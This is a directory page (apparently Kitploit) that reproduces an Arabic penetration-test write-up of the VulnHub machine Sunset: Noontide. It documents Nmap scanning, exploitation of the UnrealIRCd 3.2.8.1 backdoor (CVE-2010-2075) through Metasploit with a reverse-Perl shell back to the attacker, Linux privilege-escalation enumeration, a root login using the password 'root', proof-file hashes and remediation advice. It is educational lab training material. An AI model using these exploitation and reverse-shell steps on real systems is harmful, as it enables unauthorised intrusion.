Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
sunset-noontide-pentesting — وصف تقييم اختبار اختراق احترافي لجهاز Sunset: Noontide VulnHub، يغطي الاستطلاع، وتعداد الخدمات، واستغلال CVE-2010-2075، وما بعد الاستغلال، ورفع الصلاحيات، واختراق النظام بالكامل. | Kitploit
أدوات/GitHubGitHub/zales2004/sunset-noontide-pentesting
تصعيد الامتيازاتالاستطلاعمسح المنافذتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالأمن الشبكاتCTFاختبار الاختراق

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
التعلم والتعليم
الفريق الأحمر
مختبرات وتدريب عملي
GitHubzales2004/sunset-noontide-pentesting

sunset-noontide-pentesting

وصف تقييم اختبار اختراق احترافي لجهاز Sunset: Noontide VulnHub، يغطي الاستطلاع، وتعداد الخدمات، واستغلال CVE-2010-2075، وما بعد الاستغلال، ورفع الصلاحيات، واختراق النظام بالكامل.

عرض المستودع
منذ 9س 6دلم تتم المراجعة بعد

Sunset: Noontide — اختبار الاختراق

تقييم احترافي لاختبار الاختراق وشرح تفصيلي لـ CTF لجهاز Sunset: Noontide، وهو جهاز معرّض للثغرات بشكل متعمد من VulnHub.

يوثّق هذا المشروع دورة حياة اختبار الاختراق الكاملة، بما في ذلك الاستطلاع، وتعداد الخدمات، والبحث عن الثغرات، والاستغلال، والوصول الأولي، وما بعد الاستغلال، ورفع الصلاحيات، وإثبات الاختراق، وتقييم المخاطر، وربط MITRE ATT&CK، والمعالجة.

⚠️ إخلاء المسؤولية: تم إجراء هذا التقييم ضد جهاز معرّض للثغرات بشكل متعمد في بيئة مختبرية مصرّح بها. التقنيات والأوامر الموثّقة هنا مخصصة فقط للأنظمة التي تم الحصول على تصريح صريح بشأنها.


🎯 الأهداف

  • تحديد المضيف الهدف
  • تعداد الخدمات المكشوفة
  • تحديد البرمجيات والنسخ المعرّضة للثغرات
  • البحث في الثغرات القابلة للتطبيق
  • استغلال الخدمة المعرّضة للثغرات
  • الحصول على وصول أولي إلى shell
  • إجراء تعداد ما بعد الاستغلال على Linux
  • تحديد فرص رفع الصلاحيات
  • الحصول على وصول بمستوى root
  • استعادة ملفات إثبات المستخدم و root
  • توثيق النتائج الأمنية
  • تقديم توصيات المعالجة

🖥️ بيئة المختبر

المكوّنالتفاصيل
الهدفSunset: Noontide
المنصةVulnHub
عنوان IP الهدف10.106.186.186
اسم المضيف الهدفnoontide
نظام تشغيل الهدفDebian GNU/Linux 10 (Buster)
المعماريةx86_64
منصة المهاجمKali Linux
عنوان IP المهاجم10.106.186.204
نوع التقييمتقييم مختبري مصرّح به
المخاطر الإجماليةحرجة
نتيجة التقييماختراق كامل للنظام

🔐 سلسلة الهجوم

اكتشاف الهدف → تعداد Nmap → تحديد UnrealIRCd 3.2.8.1 → SearchSploit → تحديد CVE-2010-2075 → الاستغلال عبر Metasploit → shell أوامر عن بُعد → shell باسم server → ما بعد الاستغلال على Linux → بيانات اعتماد root ضعيفة → su root → UID 0 / وصول root → ملفات إثبات المستخدم و root


1. الاستطلاع

تم إجراء اكتشاف الشبكة الأولي لتحديد الهدف المعرّض للثغرات.

تم تحديد الهدف في النهاية على أنه:

10.106.186.186

أثناء الاستطلاع، تم تحديد 10.106.186.142 على أنه البوابة الافتراضية وليس الهدف المقصود.

وهذا يبرز أهمية تحديد الهدف بشكل صحيح قبل إجراء المزيد من الاختبارات الأمنية، خاصة في شبكة مختبرية جسرية أو مشتركة.


2. تعداد الخدمات

تم إجراء اكتشاف الخدمات والإصدارات عبر Nmap ضد الهدف باستخدام:

nmap -sV 10.106.186.186

كانت الخدمة المكشوفة المهمة التي تم تحديدها أثناء التقييم هي:

6667/tcp open irc UnrealIRCd

ثم تم إجراء فحص أكثر تفصيلاً باستخدام:

nmap -sC -sV -Pn -p 6667 10.106.186.186

تم تحديد الخدمة على أنها:

UnrealIRCd 3.2.8.1

كما أبلغت خدمة IRC عن:

irc.foonet.com

أصبحت خدمة UnrealIRCd المكشوفة سطح الهجوم الأساسي الذي تم التحقيق فيه أثناء التقييم.


3. البحث عن الثغرات

تم استخدام SearchSploit للتحقيق في الثغرات الموثّقة علنًا والمرتبطة بإصدار UnrealIRCd المكتشف.

الأمر:

searchsploit UnrealIRCd 3.2.8.1

كانت النتيجة ذات الصلة:

UnrealIRCd 3.2.8.1 - Backdoor Command Exec

linux/remote/16922.rb

تم تحديد الثغرة على أنها:

CVE-2010-2075

الثغرة

تنفيذ أوامر عبر باب خلفي في UnrealIRCd 3.2.8.1

الخطورة

حرجة

نوع الهجوم

تنفيذ أوامر عن بُعد

التأثير الأمني

يتيح الاستغلال الناجح للخدمة المعرّضة للثغرات للمهاجم تنفيذ أوامر عن بُعد على النظام الهدف.


4. الاستغلال عبر Metasploit

تم استغلال خدمة IRC المعرّضة للثغرات باستخدام إطار عمل Metasploit.

كانت الوحدة المختارة:

exploit/unix/irc/unreal_ircd_3281_backdoor

مثال على الإعداد:

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOST 10.106.186.186

لم تُنتج محاولات الحمولة الأولية جلسة قابلة للاستخدام.

تم بعد ذلك اختيار حمولة Unix reverse-Perl متوافقة:

set payload cmd/unix/reverse_perl

set LHOST 10.106.186.204

set LPORT 4444

run

أبلغ Metasploit أن الهدف يبدو معرّضًا للثغرات وفتح بنجاح جلسة shell أوامر.


5. الوصول الأولي

تم التحقق من الـ shell الذي تم الحصول عليه باستخدام:

whoami

النتيجة:

server

أكّد ذلك نجاح تنفيذ الأوامر عن بُعد باسم حساب server.

كان دليل العمل الأولي:

/home/server/irc/Unreal3.2

في هذه المرحلة، انتقل التقييم من استغلال الخدمة عن بُعد إلى تعداد ما بعد الاستغلال المحلي.


6. تعداد ما بعد الاستغلال

بعد الحصول على الـ shell، تم إجراء تعداد Linux القياسي لفهم المضيف المخترق وتحديد مسارات رفع الصلاحيات المحتملة.

المستخدم الحالي

الأمر:

id

النتيجة:

uid=1000(server) gid=1000(server)

كان الحساب مستخدمًا غير root.

اسم المضيف

الأمر:

hostname

النتيجة:

noontide

معلومات النواة

الأمر:

uname -a

النتيجة:

Linux noontide 4.19.0-10-amd64 x86_64

نظام التشغيل

الأمر:

cat /etc/os-release

النتيجة:

Debian GNU/Linux 10 (buster)

أنشأت هذه الأوامر الهوية الحالية، واسم المضيف، وإصدار النواة، ونظام التشغيل، والتكوين العام للنظام.


7. تعداد رفع الصلاحيات

تم إجراء عدة فحوصات قياسية لرفع الصلاحيات على Linux.

7.1 تعداد SUID

الأمر:

find / -perm -4000 -type f 2>/dev/null

تم تحديد ملفات SUID القياسية مثل passwd و chsh و mount و umount و su و chfn و newgrp و gpasswd.

لم يتم تحديد أي ملف SUID مخصص أو شاذ بشكل واضح كمتجه ناجح لرفع الصلاحيات.


7.2 تعداد Sudo

الأمر:

sudo -l

لم يتم تحديد أي مسار مفيد لرفع الصلاحيات عبر sudo من المخرجات المتاحة.


7.3 تعداد Cron

الأوامر:

cat /etc/crontab

ls -la /etc/cron.d/

ls -la /etc/cron.hourly/

ls -la /etc/cron.daily/

ls -la /etc/cron.weekly/

كانت المهام المجدولة الملاحظة مهام نظام قياسية بنمط Debian.

لم يتم تحديد أي مهمة cron تابعة لـ root قابلة للكتابة بشكل واضح.


7.4 تعداد الملفات القابلة للكتابة

الأمر:

find / -writable -type f 2>/dev/null | head -100

كانت النتائج الأولية في الأساس ملفات pseudo ضمن /proc ولم تكشف عن متجه عملي لرفع الصلاحيات.


7.5 قدرات Linux

الأمر:

getcap -r / 2>/dev/null

لم يتم تحديد أي رفع صلاحيات مفيد قائم على القدرات من المخرجات الناتجة.


8. رفع الصلاحيات

استند مسار رفع الصلاحيات الناجح إلى بيانات اعتماد root الضعيفة بشكل متعمد والمكوّنة على الجهاز المعرّض للثغرات.

تم الوصول إلى حساب root باستخدام:

su root

كلمة المرور:

root

ثم تم التحقق من وصول root باستخدام:

id

النتيجة:

uid=0(root) gid=0(root) groups=0(root)

كما تم تأكيد الهوية باستخدام:

whoami

النتيجة:

root

أكّد ذلك السيطرة الإدارية الكاملة على النظام الهدف.


9. إثبات الاختراق

9.1 إثبات على مستوى المستخدم

كان ملف الإثبات على مستوى المستخدم موجودًا في:

/home/server/local.txt

الأمر:

cat /home/server/local.txt

النتيجة:

c53c08b5bf2b0801c5d0c24149826a6e


9.2 إثبات على مستوى root

كان ملف الإثبات على مستوى root موجودًا في:

/root/proof.txt

الأمر:

cat /root/proof.txt

النتيجة:

ab28c8ca8da1b9ffc2d702ac54221105

كما أعاد إثبات root:

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

يؤكد استرداد كلا ملفي الإثبات نجاح الاختراق من الوصول الأولي عن بُعد وصولاً إلى السيطرة بمستوى root.


10. ملخص المخاطر

المعرّفالنتيجةالخطورةالتأثير
VULN-01باب خلفي في UnrealIRCd 3.2.8.1🔴 حرجةتنفيذ أوامر عن بُعد
VULN-02بيانات اعتماد root ضعيفة🔴 حرجةاختراق إداري كامل

11. النتائج التفصيلية

VULN-01 — باب خلفي في UnrealIRCd 3.2.8.1

الخطورة: حرجة

الخدمة المتأثرة: IRC / TCP 6667

البرمجية المتأثرة: UnrealIRCd 3.2.8.1

CVE: CVE-2010-2075

نوع الهجوم: تنفيذ أوامر عن بُعد

التأثير الملاحظ: الحصول على shell عن بُعد باسم server

الوصف

كانت خدمة UnrealIRCd المكشوفة تعمل بإصدار معرّض للثغرات مرتبط بثغرة تنفيذ أوامر عبر باب خلفي معروفة.

تم تحديد الثغرة من خلال تعداد الخدمات والبحث في SearchSploit، وتم استغلالها بنجاح باستخدام Metasploit.

التأثير على الأعمال

يمكن للمهاجم القادر على الوصول إلى خدمة IRC المعرّضة للثغرات تنفيذ أوامر عن بُعد والحصول على وصول غير مصرّح به إلى المضيف.


VULN-02 — بيانات اعتماد root ضعيفة

الخطورة: حرجة

الحساب المتأثر: root

بيانات الاعتماد الملاحظة: root / root

التأثير الملاحظ: وصول إداري بـ UID 0

الوصف

تم تكوين حساب root ببيانات اعتماد ضعيفة للغاية.

بعد الحصول على shell محلي باسم server، تم الوصول إلى حساب root باستخدام بيانات الاعتماد الضعيفة وتم التحقق منها بـ UID 0.

التأثير على الأعمال

يمكن للمهاجم الذي يحصل على وصول shell محلي استخدام بيانات اعتماد root الضعيفة للحصول على سيطرة كاملة على نظام التشغيل.


12. ربط MITRE ATT&CK


13. توصيات المعالجة

13.1 إزالة أو ترقية UnrealIRCd

استبدل تثبيت UnrealIRCd المعرّض للثغرات بإصدار موثوق ومدعوم.

تحقق من سلامة البرمجيات ومصدر الحزم قبل النشر.

13.2 إزالة البرمجيات التي تحتوي على باب خلفي

إذا كانت سلامة البرمجيات أو مصدرها غير مؤكد، فأعد بناء النظام باستخدام وسائط تثبيت موثوقة وحزم تم التحقق منها.

13.3 إزالة بيانات الاعتماد الضعيفة

استبدل بيانات الاعتماد الافتراضية والضعيفة ببيانات اعتماد إدارية قوية وفريدة.

لا تستخدم كلمات مرور بسيطة مثل root.

13.4 تقييد كشف IRC

إذا كانت خدمة IRC مطلوبة، فقيّد الوصول باستخدام:

  • قواعد جدار الحماية
  • تقسيم الشبكة
  • الوصول عبر VPN
  • قيود عنوان IP المصدر

13.5 تطبيق التحديثات الأمنية

حافظ على عملية موثّقة لإدارة التصحيحات لنظام التشغيل وجميع الخدمات المكشوفة.

13.6 مراقبة الوصول المميّز

سجّل وراجع:

  • المصادقة الإدارية
  • وصول root
  • تغييرات الصلاحيات
  • نشاط المصادقة المشبوه

14. منهجية اختبار الاختراق


15. الأدوات المستخدمة

  • Nmap — اكتشاف الشبكة وتعداد الخدمات
  • SearchSploit — البحث عن الثغرات والاستغلالات
  • Metasploit Framework — الاستغلال وإنشاء الجلسات
  • أدوات سطر أوامر Linux — ما بعد الاستغلال وتعداد الصلاحيات

16. المهارات المُظهَرة

  • استطلاع الشبكة
  • اكتشاف المضيف
  • فحص المنافذ
  • تعداد الخدمات
  • تحديد الإصدارات
  • تقييم الثغرات
  • البحث في CVE
  • SearchSploit
  • Metasploit Framework
  • تنفيذ أوامر عن بُعد
  • تعداد Linux
  • تعداد SUID
  • تعداد Sudo
  • تعداد Cron
  • تعداد الملفات القابلة للكتابة
  • قدرات Linux
  • تقييم أمان بيانات الاعتماد
  • رفع الصلاحيات
  • إثبات الاختراق
  • ربط MITRE ATT&CK
  • تقييم المخاطر
  • إعداد التقارير الأمنية
  • تحليل المعالجة

17. التقييم النهائي

تم اختراق المضيف Sunset: Noontide بنجاح من الوصول الأولي إلى الشبكة وصولاً إلى سيطرة كاملة بمستوى root.

كانت ثغرة الوصول الأولي الأساسية هي الباب الخلفي في UnrealIRCd 3.2.8.1 (CVE-2010-2075).

وفّرت الثغرة تنفيذ أوامر عن بُعد وأدّت إلى shell أولي باسم حساب server.

ثم تم إجراء تعداد ما بعد الاستغلال، بما في ذلك فحوصات SUID و sudo و cron والملفات القابلة للكتابة وقدرات Linux والهوية ونظام التشغيل ونظام الملفات.

لم تحدد هذه الفحوصات مسار رفع الصلاحيات الناجح.

تم تحقيق الوصول الإداري الكامل في النهاية من خلال بيانات اعتماد root الضعيفة على الجهاز.

أكّد الاسترداد الناجح لكل من ملفي الإثبات على مستوى المستخدم ومستوى root الاختراق الكامل للنظام.

التقييم الإجمالي

حرجة — تم تحقيق اختراق كامل للنظام


18. نتائج التقييم


19. تقرير اختبار الاختراق الاحترافي

يتضمن هذا المشروع تقريرًا احترافيًا مفصلاً لاختبار الاختراق:

Sunset-Noontide-Penetration-Testing-Report.pdf

يحتوي التقرير على:

  • الملخص التنفيذي
  • ضبط المستند
  • النطاق وقواعد المشاركة
  • ملخص المخاطر
  • مسار الهجوم
  • الاستطلاع
  • تعداد الخدمات
  • البحث عن الثغرات
  • الاستغلال عبر Metasploit
  • الوصول الأولي
  • ما بعد الاستغلال
  • رفع الصلاحيات
  • الأدلة وملفات الإثبات
  • النتائج التفصيلية
  • ربط MITRE ATT&CK
  • توصيات المعالجة
  • التقييم النهائي

20. الأدلة

هيكل المستودع المقترح:

sunset-noontide-pentesting/

├── README.md

├── Sunset-Noontide-Penetration-Testing-Report.pdf

└── evidence/

├── 01-target-discovery.png

├── 02-nmap-enumeration.png

├── 03-searchsploit.png

├── 04-metasploit-exploitation.png

├── 05-initial-shell.png

├── 06-post-exploitation.png

├── 07-privilege-escalation.png

└── 08-root-proof.png

يجب أن تحتوي لقطات الشاشة على معلومات من البيئة المختبرية المصرّح بها فقط.


21. الدروس المستفادة

وفّر هذا التقييم خبرة عملية في:

  1. تحديد الهدف المقصود بشكل صحيح في بيئة شبكية.
  2. إجراء تعداد الخدمات والإصدارات باستخدام Nmap.
  3. البحث عن الثغرات باستخدام SearchSploit.
  4. اختيار وحدة استغلال مناسبة في Metasploit.
  5. استكشاف مشكلات توافق الحمولات وإصلاحها.
  6. إنشاء shell أوامر عن بُعد.
  7. إجراء تعداد ما بعد الاستغلال على Linux.
  8. الفحص المنهجي لمتجهات رفع الصلاحيات الشائعة.
  9. تحديد بيانات الاعتماد الإدارية الضعيفة.
  10. التحقق من الاختراق بمستوى root.
  11. جمع أدلة إثبات الاختراق.
  12. توثيق الثغرات بصيغة احترافية لاختبار الاختراق.

22. ⚠️ إخلاء المسؤولية القانونية والأخلاقية

هذا المستودع مخصص بشكل صارم لـ:

  • التعليم في مجال الأمن السيبراني
  • اختبار الاختراق المصرّح به
  • التدريب على CTF
  • البحث عن الثغرات
  • البيئات المختبرية

يجب تنفيذ التقنيات الموثّقة في هذا المستودع فقط ضد الأنظمة التي تم الحصول على تصريح صريح بشأنها.

لا تستخدم هذه التقنيات ضد أنظمة الإنتاج أو البنية التحتية العامة أو أنظمة الأطراف الثالثة دون إذن.


👨‍💻 المؤلف

Alen Sales K S

الأمن السيبراني | اختبار الاختراق | SOC | أمن الشبكات

GitHub: https://github.com/zales2004


⭐ ملخص المشروع

يوضّح Sunset: Noontide سير عمل كاملاً لاختبار الاختراق:

الاستطلاع → التعداد → البحث عن الثغرات → الاستغلال → الوصول الأولي → ما بعد الاستغلال → رفع الصلاحيات → وصول root → جمع الأدلة → تقييم المخاطر → إعداد التقارير الأمنية

نتيجة التقييم: حرجة — تم تحقيق اختراق كامل للنظام

تنزيل الأداة
التقنيةالمعرّفالنشاط الملاحظ
Network Service ScanningT1046تعداد Nmap
Exploit Public-Facing ApplicationT1190استغلال خدمة UnrealIRCd المكشوفة
Command and Scripting InterpreterT1059shell أوامر عن بُعد
Valid AccountsT1078استخدام بيانات اعتماد root
Account DiscoveryT1087تعداد الهوية والمستخدمين
System Information DiscoveryT1082uname و /etc/os-release
File and Directory DiscoveryT1083تعداد نظام الملفات
Scheduled Task/Job DiscoveryT1053تعداد Cron
Permission Groups DiscoveryT1069id وتعداد المجموعات
المرحلةالأنشطة
الاستطلاعاكتشاف الشبكة وتحديد الهدف
التعداداكتشاف الخدمات/الإصدارات عبر Nmap
البحث عن الثغراتتحديد وحدات SearchSploit و Metasploit
الاستغلالاستغلال الباب الخلفي في UnrealIRCd
الوصول الأوليshell أوامر باسم server
ما بعد الاستغلالتعداد الهوية ونظام التشغيل ونظام الملفات والصلاحيات
رفع الصلاحياتفحوصات SUID و sudo و cron والملفات القابلة للكتابة والقدرات
جمع الأدلةملفات إثبات المستخدم و root
إعداد التقاريرالنتائج وتحليل المخاطر والمعالجة
الهدفالحالة
تحديد الهدف✅ PASS
تحديد الخدمة المكشوفة✅ PASS
تحديد الإصدار المعرّض للثغرات✅ PASS
تحديد CVE✅ PASS
تنفيذ أوامر عن بُعد✅ PASS
shell أولي باسم server✅ PASS
استرداد إثبات المستخدم✅ PASS
رفع الصلاحيات✅ PASS
التحقق من وصول root✅ PASS
استرداد إثبات root✅ PASS